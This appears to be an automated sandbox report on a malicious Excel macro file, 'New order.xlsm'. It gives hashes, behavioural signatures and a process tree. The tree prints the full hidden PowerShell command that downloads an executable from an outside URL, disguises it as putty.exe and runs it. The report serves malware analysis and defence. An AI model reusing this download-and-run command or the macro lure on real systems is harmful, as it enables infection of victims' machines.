Analysis
- max time kernel: 144s
- max time network: 145s
- platform: windows10_x64
- resource: win10
- submitted: 09-07-2020 18:32
- Static task: static1
- Behavioral task: behavioral1 (Sample: New order.xlsm; Resource: win7v200430)
- Behavioral task: behavioral2 (Sample: New order.xlsm; Resource: win10)
General
- Target: New order.xlsm
- Size: 92KB
- MD5: 2433e76542036ab53b138a98eeda548a
- SHA1: fa75a6ce57ec974345eb05a9d5e587a1eef772be
- SHA256: 148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc
- SHA512: 3ae2f70b3d39d85d1befea180ee75815abb20349a90cf3678db2e001d5ac362f68230e30680c897e33a05a6dbc1d8a776505751da043797b15327bb38251d243
Malware Config
- Extracted: http://sagc.be/svc.exe
Signatures
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: EXCEL.EXE, powershell.exe
  description | pid | process | target process
  PID 4092 wrote to memory of 1004 | 4092 | EXCEL.EXE | powershell.exe (2 entries)
  PID 1004 wrote to memory of 1568 | 1004 | powershell.exe | putty.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, WerFault.exe
  description | pid | process
  Token: SeDebugPrivilege | 1004 | powershell.exe
  Token: SeRestorePrivilege | 3540 | WerFault.exe
  Token: SeBackupPrivilege | 3540 | WerFault.exe
  Token: SeDebugPrivilege | 3540 | WerFault.exe
- Suspicious behavior: EnumeratesProcesses (19 IoCs)
  Processes: powershell.exe, WerFault.exe
  pid | process
  1004 | powershell.exe (3 entries)
  3540 | WerFault.exe (16 entries)
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid | process
  9 | 1004 | powershell.exe
- Program crash (1 IoC)
  Processes: WerFault.exe
  pid | pid_target | process | target process
  3540 | 1568 | WerFault.exe | putty.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: EXCEL.EXE
  pid | process
  4092 | EXCEL.EXE
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes: EXCEL.EXE
  pid | process
  4092 | EXCEL.EXE (2 entries)
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powershell.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1004 | 4092 | powershell.exe | EXCEL.EXE
- Executes dropped EXE (1 IoC)
  Processes: putty.exe
  pid | process
  1568 | putty.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: EXCEL.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes: EXCEL.EXE
  pid | process
  4092 | EXCEL.EXE (14 entries)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1, PID: 4092)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New order.xlsm"
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID: 1004)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://sagc.be/svc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Process spawned unexpected child process
    - C:\Users\Admin\AppData\Local\Temp\putty.exe (depth 3, PID: 1568)
      Command line: "C:\Users\Admin\AppData\Local\Temp\putty.exe"
      - Executes dropped EXE
      - C:\Windows\SysWOW64\WerFault.exe (depth 4, PID: 3540)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 872
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
        - Program crash